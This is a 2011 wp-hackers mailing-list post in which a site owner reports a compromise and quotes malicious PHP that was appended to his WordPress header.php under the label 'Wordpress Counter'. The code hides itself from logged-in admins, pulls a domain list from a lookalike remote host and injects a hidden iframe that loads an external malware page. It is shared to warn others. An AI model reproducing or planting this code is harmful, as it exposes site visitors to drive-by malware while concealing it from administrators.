[wp-hackers] Malware infestation ensures the admin can't encounter malware code via header.php
Raj Sekharan
flarecore at gmail.com
Fri Oct 7 08:23:23 UTC 2011
Hope it helps someone.
On Fri, Oct 7, 2011 at 1:52 PM, Raj Sekharan <flarecore at gmail.com> wrote:
> My website was recently compromised, and my header.php file was appended
> with the following code:
>
> <!-- Wordpress Counter -->
> <?php
> if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {
> if ( get_option ( 'domain_update' ) === FALSE && ( $newdomain =
> get_new_domain() ) ) {
> add_option ( 'domain', $newdomain, '', 'no' );
> add_option ( 'domain_update', time (), '', 'no' );
> }
> if ( time () - get_option ( 'domain_update' ) > 10*60 && ( $newdomain =
> get_new_domain() ) ) {
> update_option ( 'domain', $newdomain );
> update_option ( 'domain_update', time () );
> }
>
> $domain = get_option ( 'domain' );
> if ($domain)
> echo
> '<script language="javascript">
> var ExpDate = new Date ();
> ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
> SetCookie("MTPT","1",ExpDate, "/");
>
> function SetCookie (name, value) {
> var argv = SetCookie.arguments;
> var argc = SetCookie.arguments.length;
> var expires = (argc > 2) ? argv[2] : null;
> var path = (argc > 3) ? argv[3] : null;
> var domain = (argc > 4) ? argv[4] : null;
> var secure = (argc > 5) ? argv[5] : false;
> document.cookie = name + "=" + escape (value) +
> ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
> ((path == null) ? "" : ("; path=" + path)) +
> ((domain == null) ? "" : ("; domain=" + domain)) +
> ((secure == true) ? "; secure" : "");
> }
> </script>
> <iframe src="http://' . $domain . '/kwizhveo.php" width="1" height="1"
> frameborder="0">
> </iframe>';
> }
>
> function get_new_domain () {
> $url = 'http://googlesafebrowsing.com/remoted.cc.txt';
> if ( function_exists ( 'curl_init' ) ) {
> $ch = @curl_init ( $url );
> @curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
> $doms = @curl_exec ( $ch );
> @curl_close ( $ch );
> }
> else
> $doms = @file_get_contents ( $url );
> if ( strpos ( $doms, '||' ) === false )
> return false;
>
> $domains = explode ( '||', trim ( $doms ) );
> return $domains[array_rand ( $domains )];
> }
> ?>
>
> <!-- Wordpress Counter -->
>
> Unlike before where a dummy iframe was just appended, this one ensures that
> the logged in administrator cannot actually encounter the malware code. The
> attacker even called it "WordPress Counter" in the comment.
>
More information about the wp-hackers
mailing list